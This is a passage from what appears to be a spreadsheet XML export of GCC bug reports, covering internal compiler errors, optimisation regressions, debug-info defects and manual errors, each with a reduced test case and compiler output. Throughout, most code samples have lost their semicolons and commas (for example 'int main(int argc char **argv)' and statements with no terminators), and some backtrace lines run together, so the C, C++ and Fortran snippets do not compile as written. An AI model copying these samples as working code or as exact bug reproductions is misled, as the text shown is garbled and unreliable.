	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-7.0.0_alpha20170122/work/gcc-7-20170122/gcc/cfghooks.h:198
0x3177cca26d7 commit_edge_insertions()
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-7.0.0_alpha20170122/work/gcc-7-20170122/gcc/cfgrtl.c:2095
0x3177d7f62a8 bypass_conditional_jumps
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-7.0.0_alpha20170122/work/gcc-7-20170122/gcc/cprop.c:1742
0x3177d7f62a8 one_cprop_pass
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-7.0.0_alpha20170122/work/gcc-7-20170122/gcc/cprop.c:1866
0x3177d7f62a8 execute_rtl_cprop
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-7.0.0_alpha20170122/work/gcc-7-20170122/gcc/cprop.c:1918
0x3177d7f62a8 execute
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-7.0.0_alpha20170122/work/gcc-7-20170122/gcc/cprop.c:1956</t>
  </si>
  <si>
    <t>bernds</t>
  </si>
  <si>
    <t>GCC-19560</t>
  </si>
  <si>
    <t>Adding -g disables -foptimize-sibling-calls optimization in some cases</t>
  </si>
  <si>
    <t xml:space="preserve">
	With the option -foptimize-sibling-calls tail recursion is
        performed. Adding -g destroys this optimization. In my opinion
        adding compiler option -g should not change the behaviour of
        the compiled program.
Environment:
System: SunOS rungner.nada.kth.se 5.9 Generic_117171-07 sun4u sparc SUNWSun-Fire-280R
Architecture: sun4
host: sparc-sun-solaris2.9
build: sparc-sun-solaris2.9
target: sparc-sun-solaris2.9
configured with: /afs/.nada.kth.se/pkg/gcc/src/3.4.2/gcc-3.4.2/configure --prefix=/pkg/gcc/3.4.2/os
How-To-Repeat:
	Compile the following program:
/*
 * In this function it seems that tail recursion is performed both with
 *
 *   gcc -foptimize-sibling-calls -S tail.c 
 *
 * and with
 *
 *   gcc -g -foptimize-sibling-calls -S tail.c 
 *
 * using gcc 3.4.2 on a SPARC.
 */
void f(int n)
{
    if(n &gt; 0)
	f(--n)
}
/*
 * In this function it seems that tail recursion is performed with
 *
 *   gcc -foptimize-sibling-calls -S tail.c 
 *
 * but not with
 *
 *   gcc -g -foptimize-sibling-calls -S tail.c 
 *
 * using gcc 3.4.2 on a SPARC.
 */
void g(int n)
{
    if(n &gt; 0)
	f(--n)
    return
}
int main(int argc char **argv)
{
    f(10)
    g(10)
}
	(Preprocessor output is included below.)
	For the function f() the assembler output ends with
	call	f 0
	 restore
.LL1:
	nop
	ret
	restore
.LLFE2:
	.size	f .-f
	both with and without compiler option -g. For the function
        g() however the assembler output ends with
	call	f 0
	 restore
.LL3:
	nop
	ret
	restore
	.size	g .-g
        if -g is *not* used and with
	call	f 0
	 nop
.LL3:
	nop
	ret
	restore
.LLFE3:
	.size	g .-g
	if -g *is* used. And now the preprocessor output:
# 1 tail.c
# 1 
# 1 
# 1 tail.c
# 27 tail.c
void f(int n)
{
    if(n &gt; 0)
 f(--n)
}
# 44 tail.c
void g(int n)
{
    if(n &gt; 0)
 f(--n)
    return
}
int main(int argc char **argv)
{
    f(10)
    g(10)
}</t>
  </si>
  <si>
    <t>enge</t>
  </si>
  <si>
    <t>GCC-47476</t>
  </si>
  <si>
    <t>[4.6 Regression] [C++0x] ICE in potential_constant_expression_1</t>
  </si>
  <si>
    <t>int
foo (int a int b)
{ 
  const bool c ((a != 0) == (b != 26))
  return c
}
ICEs with -std=c++0x with:
rh672156.ii:4:38: sorry unimplemented: unexpected ast of kind truth_xor_expr
rh672156.ii:4:38: internal compiler error: in potential_constant_expression_1 at cp/semantics.c:7709</t>
  </si>
  <si>
    <t>GCC-70884</t>
  </si>
  <si>
    <t>[6 regression] 2nd SRA pass confused by load from constant pool</t>
  </si>
  <si>
    <t>Created attachment 38382
Testcase
It's a regression introduced by the enhancement to SRA aimed at scalarizing loads from the constant pool: when the 2nd pass is run on the results of the 1st pass things can go astray.
Testcase attached and to compiled with -O -fno-tree-fre but unfortunately it requires a specific tuning setup that is only present on PowerPC 32-bit:
Target: powerpc-generic-linux-gnu
Configured with: ../src/configure --enable-languages=adacc++ --enable-dual-exceptions --enable-_cxa_atexit --enable-threads=posix --with-bugurl=URL:mailto:report@adacore.com --disable-nls --without-libiconv-prefix --disable-libstdcxx-pch --disable-libada --enable-checking=release --with-mpfr=/mystic.a/gnatmail/sandbox/gcc-6/ppc-linux/mpfr_stable/install --with-gmp=/mystic.a/gnatmail/sandbox/gcc-6/ppc-linux/gmp_stable/install --with-mpc=/mystic.a/gnatmail/sandbox/gcc-6/ppc-linux/mpc_stable/install --with-build-time-tools=/mystic.a/gnatmail/sandbox/gcc-6/ppc-linux/gcc/build/buildtools/bin --prefix=/mystic.a/gnatmail/sandbox/gcc-6/ppc-linux/gcc/pkg --build=powerpc-generic-linux-gnu
(botcazou@mystic) ~ $ gcc -o t t.c -O -fno-tree-fre
(botcazou@mystic) ~ $ ./t
Aborted
But the problem is clearly visible in the tree dumps with a cross-compiler.
In .108t.cplxlower1:
 :
  SR.0_6 = *.LC0.a
  MEM[(struct S *)
  MEM[(struct S *)
  foo (s1)
  s1 ={v} {CLOBBER}
  SR.2_4 = *.LC0.a
  MEM[(struct S *)
  MEM[(struct S *)
  foo (s2)
  s2 ={v} {CLOBBER}
In .109t.sra:
  :
  SR.0_6 = SR.4_7(D)
  MEM[(struct S *)
  MEM[(struct S *)
  foo (s1)
  s1 ={v} {CLOBBER}
  SR.2_4 = SR.4_7(D)
  MEM[(struct S *)
  MEM[(struct S *)
  foo (s2)
  s2 ={v} {CLOBBER}
Note the bogus new (D) thing created by SRA.</t>
  </si>
  <si>
    <t>GCC-11234</t>
  </si>
  <si>
    <t>-pedantic accepts function pointer  void*</t>
  </si>
  <si>
    <t xml:space="preserve">	gcc -ansi -pedantic accepts some instances of conversion between
	function pointers and object pointers:
		void *v = function
		(function_type) char_ptr
		(char *) function
	That's not valid ANSI C even with casts.  ANSI 3.2.2.3
	(Pointers) 3.3.4 (Cast operators) and 3.3.16.1 (Simple
	assignment) all explicitly talk about conversion to/from
	pointers to an 'object or incomplete type' that explicitly
	excludes pointers to functions.
	(Note the assignment void_ptr = function does get a warning
	but the corresponding initialization does not.)
Environment:
System: SunOS bombur.uio.no 5.8 Generic_108528-21 sun4u sparc SUNWUltra-5_10
Architecture: sun4
host: sparc-sun-solaris2.8
build: sparc-sun-solaris2.8
target: sparc-sun-solaris2.8
configured with: ../gcc-3.3/configure --enable-languages=cc++f77 --disable-shared --disable-multilib --prefix=/bombur/tmp/gcc --enable-version-specific-runtime-libs --enable-threads
How-To-Repeat:
bash$ gcc -ansi -pedantic -S a.c
a.c: In function `function':
a.c:5: warning: ISO C forbids initialization between function pointer and `void *'
a.c:6: warning: initialization from incompatible pointer type
a.c:12: warning: assignment from incompatible pointer type
a.c:13: warning: ISO C forbids assignment between function pointer and `void *'
bash$ cat a.c
typedef void (*function_type)(void)
void function(void *void_ptr char *char_ptr)
{
    function_type func_ptr = void_ptr  /* warning (ISO C) */
    char *s = function                 /* warning */
    void *v = function                 /* should warn */
    (function_type) char_ptr           /* should warn */
    (char *) function                  /* should warn */
    char_ptr = function                /* warning */
    void_ptr = function                /* warning (ISO C) */
    func_ptr = (void *)0               /* OK - null pointer constant */
}</t>
  </si>
  <si>
    <t>h.b.furuseth</t>
  </si>
  <si>
    <t>GCC-71249</t>
  </si>
  <si>
    <t>-Wswitch-unreachable false positive for a compound statement containing a used label</t>
  </si>
  <si>
    <t>While reading the changes that implement the new -Wswitch-unreachable option (bug 49859) I noticed that the hunk in gimplify_switch_exp assumes that only GIMPLE_LABEL and LABEL_TRY statements are reachable.  The following test case shows that this is an overly broad assumption and that compound statements containing labels used labels as their second or subsequent statements can also be reachable.  As a result GCC issues a false positive warning for the following test case:
$ cat xxx.c &amp;&amp; /build/gcc-trunk-svn/gcc/xgcc -B /build/gcc-trunk-svn/gcc -S -Wall xxx.c
int g (int i)
{
  switch (i) {
  { i = 0 foo: return i }
  case 3: goto foo
  }
  return i
}
xxx.c: In function â€˜gâ€™:
xxx.c:4:7: warning: statement will never be executed [-Wswitch-unreachable]
   { i = 0 foo: return i }
     ~~^~~</t>
  </si>
  <si>
    <t>GCC-2277</t>
  </si>
  <si>
    <t>reader complains about input file larger than 8230 bytes</t>
  </si>
  <si>
    <t>Using cpp with input from a pipe.
The input is larger than 10 kByte.
This results in the error message:
:0: file is too large (&gt;8230 bytes).
Reason is an apparent bug in source file cppfiles.c.
This allocates a buffer of length 8192 (+2+2).
Also it calls read_and_prescan() with len==4096.
Then calls read() with length 8192 (pfile input buffer).
Read() returns with 38 read bytes which increases offset
to 38. Next loop calls read() again with length 8192.
This time read() returns 8192 read bytes which increases
offset to 8230. Now offset (==8230) is greater than
len (==4096) so len is doubled (to 8192). Still
offset is larger than len which leads to the error
message complaining about a file that is larger than 8230
bytes.
Obviously it is just not enough to double len if
offset has become too large. Instead the increase of
len needs to take the file's buffer size (or at least the
number of successfully read bytes) into account.
Release:
GNU CPP version 2.95.2 19991024 (release) (sparc)
Environment:
Solaris 7 UltraSparc 60.</t>
  </si>
  <si>
    <t>peter.zienicke</t>
  </si>
  <si>
    <t>GCC-2239</t>
  </si>
  <si>
    <t>Use of an undeclared variable is handled but causes an Internal compiler error in weird places.</t>
  </si>
  <si>
    <t>Doesn't handled undeclared identifiers properly.
Release:
gcc version 2.95.2 19991024 (release)
Environment:
SunOS 5.5.1 Generic_103640-34 sun4u sparc sun4u
How-To-Repeat:
#include 
const int arr[256]
void f( void ) {
	memset( arr 0 256 * sizeof( int ) )
}</t>
  </si>
  <si>
    <t>mat.hounsell</t>
  </si>
  <si>
    <t>GCC-49610</t>
  </si>
  <si>
    <t>Segfault with -ftree-vectorize (or -O3)</t>
  </si>
  <si>
    <t>Created attachment 24656
Output of ajo-gcc -std=c99 -O -ftree-vectorize test.c -v
This failure reproduces for me with svn revision 175547
(2011-06-27). I'm on Ubuntu 10.10 x86-64.
cat &gt;test.c &lt;&lt;EOF
extern int g_7
void func_13(int p_17) {
    for (int i=0 i &lt; 16 i = (signed char)(i+1)) { 
        g_7 
        g_7 
    }
}
EOF
gcc -std=c99 -O -ftree-vectorize test.c 
test.c: In function â€˜func_13â€™:
test.c:2:6: internal compiler error: Segmentation fault
Program received signal SIGSEGV Segmentation fault.
flow_bb_inside_loop_p (loop=0x7ffff7ec1f68 bb=0x0) at ../../gcc/cfgloop.c:776
776	  source_loop = bb-&gt;loop_father
(gdb) backtrace
#0  flow_bb_inside_loop_p (loop=0x7ffff7ec1f68 bb=0x0)
    at ../../gcc/cfgloop.c:776
#1  0x00000000009cb3bb in vect_is_slp_reduction (loop_info=0x14c56e0 phi=XXX)
    at ../../gcc/tree-vect-loop.c:1807
#2  vect_is_simple_reduction_1 (loop_info=0x14c56e0 phi=XXX)
    at ../../gcc/tree-vect-loop.c:2269
[...]
This test case is reduced from the output of Csmith 2.1.0 (git hash 01aa8b04
https://github.com/Quuxplusone/csmith/) using the following command line:
csmith --no-paranoid --longlong --pointers --arrays --no-jumps --consts --no-volatiles --checksum --no-divs --muls --bitfields --packed-struct -s 1439171589</t>
  </si>
  <si>
    <t>arthur.j.odwyer</t>
  </si>
  <si>
    <t>GCC-60617</t>
  </si>
  <si>
    <t>[4.8 Regression] unable to find a register to spill in class 'LO_REGS'</t>
  </si>
  <si>
    <t>Created attachment 32424
preprocessed source
seen with the 4.8 branch on arm-linux-gnueabihf configured with
--with-arch=armv7-a --with-fpu=vfpv3-d16 --with-float=hard --with-mode=thumb 
omitting the -fno-tree-dce works around the issue.  not seen with the 4.7 branch and trunk 20140306.
$ g++ -std=c++11 -fPIC -fno-tree-dce -fno-exceptions -fno-omit-frame-pointer -c -g -O2 JITArithmetic32_64.ii
../Source/JavaScriptCore/jit/JITArithmetic32_64.cpp: In member function 'void JSC::JIT::emit_op_add(JSC::Instruction*)':
../Source/JavaScriptCore/jit/JITArithmetic32_64.cpp:526:1: error: unable to find a register to spill in class 'LO_REGS'
../Source/JavaScriptCore/jit/JITArithmetic32_64.cpp:526:1: error: this is the insn:
(insn 335 334 336 20 (parallel [
            (set (reg:SI 3 r3)
                (ior:SI (eq:SI (reg/v:SI 112 [ op ])
                        (reg/v:SI 110 [ dst ]))
                    (eq:SI (reg/v:SI 111 [ op ])
                        (reg/v:SI 110 [ dst ]))))
            (clobber (reg:CC 100 cc))
        ]) ../Source/JavaScriptCore/jit/JITArithmetic32_64.cpp:514 295 {*ior_scc_scc}
     (expr_list:REG_UNUSED (reg:CC 100 cc)
        (nil)))
../Source/JavaScriptCore/jit/JITArithmetic32_64.cpp:526: confused by earlier errors bailing out
Preprocessed source stored into /tmp/ccb0Osgc.out file please attach this to your bugreport.</t>
  </si>
  <si>
    <t>GCC-78225</t>
  </si>
  <si>
    <t>[7 Regression] FAIL: gcc.dg/gomp/pr27573.c (internal compiler error)</t>
  </si>
  <si>
    <t>Executing on host: /home/dave/gnu/gcc/objdir/gcc/xgcc -B/home/dave/gnu/gcc/objdir
/gcc/ /home/dave/gnu/gcc/gcc/gcc/testsuite/gcc.dg/gomp/pr27573.c    -fno-diagnost
ics-show-caret -fdiagnostics-color=never   -O2 -fopenmp -fprofile-generate -S -o 
pr27573.s    (timeout = 300)
spawn -ignore SIGHUP /home/dave/gnu/gcc/objdir/gcc/xgcc -B/home/dave/gnu/gcc/objd
ir/gcc/ /home/dave/gnu/gcc/gcc/gcc/testsuite/gcc.dg/gomp/pr27573.c -fno-diagnosti
cs-show-caret -fdiagnostics-color=never -O2 -fopenmp -fprofile-generate -S -o pr2
7573.s
/home/dave/gnu/gcc/gcc/gcc/testsuite/gcc.dg/gomp/pr27573.c: In function 'main._om
p_fn.0':
/home/dave/gnu/gcc/gcc/gcc/testsuite/gcc.dg/gomp/pr27573.c:12:9: internal compile
r error: in convert_memory_address_addr_space_1 at explow.c:284
0x122187 convert_memory_address_addr_space_1(machine_mode rtx_def* unsigned cha
r bool bool)
        ../../gcc/gcc/explow.c:284
0x345883 convert_memory_address_addr_space_1(machine_mode rtx_def* unsigned cha
r bool bool)
        ../../gcc/gcc/explow.c:386
0x345883 convert_memory_address_addr_space(machine_mode rtx_def* unsigned char)
        ../../gcc/gcc/explow.c:385
0x231cf3 get_builtin_sync_mem        ../../gcc/gcc/builtins.c:4933
0x23211f expand_builtin_atomic_fetch_op        ../../gcc/gcc/builtins.c:5452
0x23d287 expand_builtin(tree_node* rtx_def* rtx_def* machine_mode int)
        ../../gcc/gcc/builtins.c:68580x36023b expand_expr_real_1(tree_node* rtx_def* machine_mode expand_modifier 
rtx_def** bool)
        ../../gcc/gcc/expr.c:10773
0x361a57 expand_expr_real(tree_node* rtx_def* machine_mode expand_modifier rt
x_def** bool)
        ../../gcc/gcc/expr.c:8088
0x3699c3 store_expr_with_bounds(tree_node* rtx_def* int bool bool tree_node
*)
        ../../gcc/gcc/expr.c:5548
0x36a93b expand_assignment(tree_node* tree_node* bool)
        ../../gcc/gcc/expr.c:53170x258c5b expand_call_stmt
        ../../gcc/gcc/cfgexpand.c:2666
0x258c5b expand_gimple_stmt_1        ../../gcc/gcc/cfgexpand.c:3581
0x258c5b expand_gimple_stmt
        ../../gcc/gcc/cfgexpand.c:37470x25a11b expand_gimple_basic_block
        ../../gcc/gcc/cfgexpand.c:5754
0x25f5b3 execute
        ../../gcc/gcc/cfgexpand.c:6368
Please submit a full bug report
See  for instructions.
compiler exited with status 1
FAIL: gcc.dg/gomp/pr27573.c (internal compiler error)
FAIL: gcc.dg/gomp/pr27573.c (test for excess errors)
dave@mx3210:~/gnu/gcc/objdir$ ./xgcc -B./ -v
-bash: ./xgcc: No such file or directory
dave@mx3210:~/gnu/gcc/objdir$ cd gcc
dave@mx3210:~/gnu/gcc/objdir/gcc$ ./xgcc -B./ -v
Reading specs from ./specs
COLLECT_GCC=./xgcc
COLLECT_LTO_WRAPPER=./lto-wrapper
Target: hppa-linux-gnu
Configured with: ../gcc/configure --with-gnu-as --with-gnu-ld --enable-shared --enable-multiarch --enable-linker-build-id --build=hppa-linux-gnu --host=hppa-linux-gnu --target=hppa-linux-gnu --prefix=/home/dave/opt/gnu/gcc/gcc-7 --with-local-prefix=/home/dave/opt/gnu --enable-threads=posix --enable-__cxa_atexit --build=hppa-linux-gnu --enable-clocale=gnu --enable-checking=release --enable-languages=cc++objcfortranobj-c++adaltogo
Thread model: posix
gcc version 7.0.0 20161105 (experimental) [trunk revision 241877] (GCC) 
r241785 was okay.</t>
  </si>
  <si>
    <t>GCC-32383</t>
  </si>
  <si>
    <t>[4.3 regression] ICE with reciprocals and -ffast-math</t>
  </si>
  <si>
    <t>The following code snippet triggers an ICE on mainline when compiled with
g++ -O -ffast-math:
=====================================================
struct A
{
  ~A()
}
double
inline void bar (double d) { foo() /= d }
void baz()
{
  A a
  bar(2)
}
=====================================================
This is a very recent regression (not present in 4.3-20070607).
Uros I'd guess your patch is responsible for the regression:
2007-06-16  Uros Bizjak
	PR middle-end/31723
	* hooks.c (hook_tree_tree_bool_null): New hook.
	* hooks.h (hook_tree_tree_bool_null): Add prototype.
	* tree-pass.h (pass_convert_to_rsqrt): Declare.
	* passes.c (init_optimization_passes): Add pass_convert_to_rsqrt.
	* tree-ssa-math-opts.c (execute_cse_reciprocals): Scan for a/func(b)
	and convert it to reciprocal a*rfunc(b).</t>
  </si>
  <si>
    <t>GCC-16301</t>
  </si>
  <si>
    <t>[3.4 regression] ICE with strong using</t>
  </si>
  <si>
    <t>Not important but maybe worth fixing sometime anyway: 
------------------ 
namespace NS2 
{ 
  using namespace NS1 __attribute__ ((strong)) 
} 
------------------ 
g/x&gt; /home/bangerth/bin/gcc-3.4-pre/bin/c++ -c y.cc 
y.cc:3: error: expected namespace-name before __attribute__ 
y.cc:3: error: `' is not a namespace 
y.cc:3: internal compiler error: tree check: expected namespace_decl have 
error_mark in parse_using_directive at cp/name-lookup.c:3409 
Please submit a full bug report 
with preprocessed source if appropriate. 
See  for instructions. 
W.</t>
  </si>
  <si>
    <t>GCC-78029</t>
  </si>
  <si>
    <t>[7 Regression] ICE in maybe_record_trace_start at dwarf2cfi.c:2285</t>
  </si>
  <si>
    <t>The following reduced testcase shows an ICE that occurs when building 483.xalancbmk from cpu2006.
class A {
public:
  static unsigned short fgXMLString[]
}
class B {
  bool hasFeature() const
}
class XMLString {
public:
  static int compareIString(const unsigned short *)
  static bool equals(const unsigned short * const unsigned short *)
}
const short chDigit_1 = 1
const unsigned short g1_0[]{chDigit_1}
const unsigned short g2_0[]{2}
const unsigned short g3_0[]{3 4}
const unsigned short gRange[]{}
unsigned short *hasFeature_version
inline bool XMLString::equals(const unsigned short *p1
                              const unsigned short *p2) {
  if (p1 == 0)
    return false
  while (*p1 == *p2) {
    if (!*p1)
      return true
    p1++
    p2++
  }
  return false
}
bool B::hasFeature() const {
  bool anyVersion = hasFeature_version == 0 || !*hasFeature_version
       version1_0 = XMLString::equals(hasFeature_version g1_0)
  bool version2_0 = XMLString::equals(hasFeature_version g2_0)
  bool version3_0 = XMLString::equals(hasFeature_version g3_0)
  if (XMLString::compareIString(A::fgXMLString) &amp;&amp; version2_0)
    return true
  if (anyVersion || version1_0 || version2_0 || version3_0)
    return true
  XMLString::compareIString(gRange)
}
$ /home/pthaugen/install/gcc/trunk/bin/g++ -s -m64 -O2 -mcpu=power6 DOMImplementationImpl.ii
DOMImplementationImpl.ii: In member function â€˜bool B::hasFeature() constâ€™:
DOMImplementationImpl.ii:41:1: internal compiler error: in maybe_record_trace_start at dwarf2cfi.c:2285
 }
 ^
0x10665753 maybe_record_trace_start
	/home/pthaugen/src/gcc/trunk/gcc/gcc/dwarf2cfi.c:2285
0x10665c27 create_trace_edges
	/home/pthaugen/src/gcc/trunk/gcc/gcc/dwarf2cfi.c:2379
0x10665e07 scan_trace
	/home/pthaugen/src/gcc/trunk/gcc/gcc/dwarf2cfi.c:2593
0x10666aa3 create_cfi_notes
	/home/pthaugen/src/gcc/trunk/gcc/gcc/dwarf2cfi.c:2619
0x10666aa3 execute_dwarf2_frame
	/home/pthaugen/src/gcc/trunk/gcc/gcc/dwarf2cfi.c:2977
0x10666aa3 execute
	/home/pthaugen/src/gcc/trunk/gcc/gcc/dwarf2cfi.c:3457
Please submit a full bug report
with preprocessed source if appropriate.</t>
  </si>
  <si>
    <t>pthaugen</t>
  </si>
  <si>
    <t>GCC-81306</t>
  </si>
  <si>
    <t>valgrind error for function warn_for_multistatement_macros in file c-warn.c line 2474</t>
  </si>
  <si>
    <t>I just tried a valgrind build of trunk gcc and valgrind said this:
==19127== Conditional jump or move depends on uninitialised value(s)
==19127==    at 0x660AB4: warn_for_multistatement_macros(unsigned int unsigned int unsigned int rid) (c-warn.c:2474)
==19127==    by 0x5D2A85: c_parser_else_body (c-parser.c:5569)
==19127==    by 0x5D2A85: c_parser_if_statement (c-parser.c:5678)
==19127==    by 0x5D2A85: c_parser_statement_after_labels(c_parser* bool* vec*) (c-parser.c:5243)
File c-warn.c line 2474 is this code
      if (MACRO_MAP_LOCATIONS (macro_map)[i] == next_loc_exp)
Configure line is
../trunk/configure --prefix=/home/dcb/gcc/results.249949 \
	--disable-bootstrap \
	--disable-multilib \
	--disable-werror \
	--enable-checking=valgrind \
	--enable-languages=cc++fortran
and there is some extra fiddling to get -O3 in the top level Makefile:
sed 's/-O2/-O3 -Wall -Wlogical-op/'  Makefile.tmp
mv Makefile.tmp Makefile</t>
  </si>
  <si>
    <t>GCC-14048</t>
  </si>
  <si>
    <t>[4.0 regression] bad debug line numbers near return statement c++</t>
  </si>
  <si>
    <t>I have a simple C++ program with some instance variables:
  int main (void)
  {
    A alpha *aap *abp
    B beta *bbp
    ...
    return 0
  }
The command line is: gcc -S -gdwarf-2
The return 0 line is on line 65.
With gcc HEAD 2004-02-01 15:37:18 UTC the generated code for return 0 looks
like this:
  .LBB10:
    .loc 1 65 0
    leal -56(%ebp) %eax
    movl %eax (%esp)
    call B::~B [in-charge]()
    leal -24(%ebp) %eax
    movl %eax (%esp)
    call A::~A [in-charge]()
  .LBE10:
    movl $0 %eax
Simple and good.  I can set a breakpoint on line 65 the return 0 line and
look at the values of A and B before they are destroyed.
With gcc tree-ssa-20020619-branch 2004-02-05 12:45:13 UTC the generated code
looks like this:
    movl $0 %ebx
    .loc 1 56 0
    leal -56(%ebp) %eax
    movl %eax (%esp)
    call B::~B [in-charge]()
    .loc 1 55 0
    leal -24(%ebp) %eax
    movl %eax (%esp)
    call A::~A [in-charge]()
    movl %ebx %eax
  .LBE2:
    .loc 1 66 0
    movl -4(%ebp) %ebx
    leave
    ret
The return 0 line has had its code split up into two pieces movl 0 %ebx
and movl %ebx %eax which are separated.
There is no more .loc 1 65 at all.  Instead there are some .loc lines for the
destructor calls which reference the lines that *declared* A and B.
When I try to break on line 65 and print A and B gdb selects the .loc for
line 66 which comes after the destructors so the local instance variables have
been destroyed.
This happens with both dwarf-2 and stabs+.
There needs to be a .loc 1 65 for the return 0 line and it needs to occur
before the destructors.</t>
  </si>
  <si>
    <t>GCC-71061</t>
  </si>
  <si>
    <t>[ARM] is not setting instruction length for pop* patterns</t>
  </si>
  <si>
    <t>This is causing wrong size calculation and may affect some rtl pass for example bb-order where copy_bb_p needs accurate insn length info.
This have eventually part of the reason for https://gcc.gnu.org/ml/gcc-patches/2016-05/msg00639.html where bb-order failed to do the bb copy.
For the fix I think we should extend arm_attr_length_push_multi to pop* pattern.</t>
  </si>
  <si>
    <t>jiwang</t>
  </si>
  <si>
    <t>GCC-62309</t>
  </si>
  <si>
    <t>-fno-automatic with -finit-local prevents initialization of automatics in recursive functions</t>
  </si>
  <si>
    <t>It seems with gcc-4.8.3 -fno-automatic prevents initializers from being applied to automatic variables. The following does not behave as I would expect it to with (linux-x86-64):
      function f (x)
        implicit none
        integer f x
        integer a ! should be SAVEd from -fno-automatic
        a = a + x ! should increment by y every time
        f = a
        return
      endfunction
      recursive function g (x)
        implicit none
        integer g x
        integer b ! should be automatic from recursive
        b = b + x ! should be set to y every time
        g = b
        return
      endfunction
      implicit none
      integer f g
      ! Should return static value of a accumulates x
      print * f(3) ! -&gt; 3 ok
      print * f(4) ! -&gt; 7 ok
      print * f(2) ! -&gt; 2 ok
      ! Should return automatic value of c equal to y each time
      print * g(3) ! -&gt; garbage expected 3
      print * g(4) ! -&gt; garbage expected 4
      print * g(2) ! -&gt; garbage expected 2
      end
$ gfortran -fno-automatic -finit-local-zero auto_test.f
$ ./a.out
           3
           7
           9
       32770
       32771
       32769
$
According to gfortran's manual page -fno-automatic should Treat each program unit (except those marked as RECURSIVE) as if the SAVE statement were specified for every local variable [...]. As far as I can tell -finit-local-zero should still initialize automatic variables in RECURSIVE functions.</t>
  </si>
  <si>
    <t>fritzoreese</t>
  </si>
  <si>
    <t>GCC-79289</t>
  </si>
  <si>
    <t>DWARF info for typeof of C function with no args and no prototype is empty pointer</t>
  </si>
  <si>
    <t>Compile this program with current mainline with -g on GNU/Linux:
static void sub() {}
void f1() { sub() }
void f2(void) { sub() }
__typeof__(f1) *v1
__typeof__(f2) *v2
Using readelf --debug to examine the debug info I see this for v1:
: Abbrev Number: 2 (DW_TAG_variable)
       DW_AT_name        : v1       
       DW_AT_decl_file   : 1        
       DW_AT_decl_line   : 4        
       DW_AT_type        :    
       DW_AT_external    : 1        
       DW_AT_location    : 9 byte block: 3 8 0 0 0 0 0 0 0  (DW_OP_addr: 8)
 : Abbrev Number: 3 (DW_TAG_pointer_type)
       DW_AT_byte_size   : 8        
Note that the type of v1 is a pointer but there is no type listed for what it points to.
By comparison the debug info for v2 is:
 : Abbrev Number: 4 (DW_TAG_subroutine_type)
       DW_AT_prototyped  : 1        
 : Abbrev Number: 2 (DW_TAG_variable)
       DW_AT_name        : v2       
       DW_AT_decl_file   : 1        
       DW_AT_decl_line   : 5        
       DW_AT_type        :    
       DW_AT_external    : 1        
       DW_AT_location    : 9 byte block: 3 8 0 0 0 0 0 0 0  (DW_OP_addr: 8)
 : Abbrev Number: 5 (DW_TAG_pointer_type)
       DW_AT_byte_size   : 8        
       DW_AT_type        :    
Here the type of v2 is clearly a pointer to a function although there is no real information about the function: just that it is prototyped.
By comparison with GCC 6 I see this for v1:
 : Abbrev Number: 2 (DW_TAG_subroutine_type)
       DW_AT_sibling     :    
 : Abbrev Number: 3 (DW_TAG_unspecified_parameters)
 : Abbrev Number: 0
 : Abbrev Number: 4 (DW_TAG_variable)
       DW_AT_name        : v1       
       DW_AT_decl_file   : 1        
       DW_AT_decl_line   : 4        
       DW_AT_type        :    
       DW_AT_external    : 1        
       DW_AT_location    : 9 byte block: 3 8 0 0 0 0 0 0 0  (DW_OP_addr: 8)
 : Abbrev Number: 5 (DW_TAG_pointer_type)
       DW_AT_byte_size   : 8        
       DW_AT_type        :    
and I see this for v2 (the same as for GCC 7):
 : Abbrev Number: 6 (DW_TAG_subroutine_type)
       DW_AT_prototyped  : 1        
 : Abbrev Number: 4 (DW_TAG_variable)
       DW_AT_name        : v2       
       DW_AT_decl_file   : 1        
       DW_AT_decl_line   : 5        
       DW_AT_type        :    
       DW_AT_external    : 1        
       DW_AT_location    : 9 byte block: 3 8 0 0 0 0 0 0 0  (DW_OP_addr: 8)
 : Abbrev Number: 5 (DW_TAG_pointer_type)
       DW_AT_byte_size   : 8        
       DW_AT_type        :    
I'm not entirely sure what is correct here but a pointer type that doesn't point to anything must be wrong.  The change from GCC 6 to GCC 7 in the debug info for v1 is a regression.</t>
  </si>
  <si>
    <t>GCC-11280</t>
  </si>
  <si>
    <t>[3.3/3.4 Regression] Manual incorrect WRT -freorder-blocks</t>
  </si>
  <si>
    <t>The manual item for -freorder-blocks says:-
Enabled at levels -O2 -O3 -Os.
Yet in the same manual the item for -Os says:-
-Os disables the following optimization flags:
          -falign-functions  -falign-jumps  -falign-loops 
          -falign-labels  -freorder-blocks  -fprefetch-loop-arrays
Obviously one has to be wrong.
Compiling a test program with -fverbose-asm -S confirms that -freorder-blocks
is not used at -Os</t>
  </si>
  <si>
    <t>gschafer</t>
  </si>
  <si>
    <t>GCC-37417</t>
  </si>
  <si>
    <t>[4.4 Regression] error: type mismatch in binary expression verify_gimple failed</t>
  </si>
  <si>
    <t>With current trunk (revision 140100):
(sid)1089:tbm@em64t: ~] /usr/lib/gcc-snapshot/bin/gcc -c -O2 asc-edgen.ii
./../../edgen.cpp: In member function 'void tmapgenerator::init()':
./../../edgen.cpp:71: error: type mismatch in binary expression
long unsigned int
long unsigned int
int
D.95017 = D.95016 + 1
./../../edgen.cpp:71: internal compiler error: verify_gimple failed
Please submit a full bug report</t>
  </si>
  <si>
    <t>GCC-23053</t>
  </si>
  <si>
    <t>Const-correctness issue in TR1 hashtable</t>
  </si>
  <si>
    <t>I get errors when I try to compile the following bit of code:
#include 
int main()
{
        std::tr1::unordered_set s
        const std::tr1::unordered_set 
        s_ref.find(27) // Problem is here.
        return 0
}
It appears that hashtable::find_node should be marked as a const member 
function and isn't. Putting const in (see below) seems to let the thing work 
though I haven't tested it rigorously.
debian-800:/usr/include/c++/4.0/tr1# diff hashtable-orig hashtable-fixed
863c863
&lt;   node* find_node (node* p const key_type
---
&gt;   node* find_node (node* p const key_type&amp; k typename hashtable::hash_code_t
c) const
1219c1219
&lt; ::find_node (node* p const key_type&amp; k typename hashtable::hash_code_t code)
---
&gt; ::find_node (node* p const key_type&amp; k typename hashtable::hash_code_t code)
const
Here's the full text of the error I get:
david@debian-800:~/c$ g++-4.0 -v -save-temps -fmessage-length=80 temp.cpp
Using built-in specs.
Target: i486-linux-gnu
Configured with: ../src/configure -v
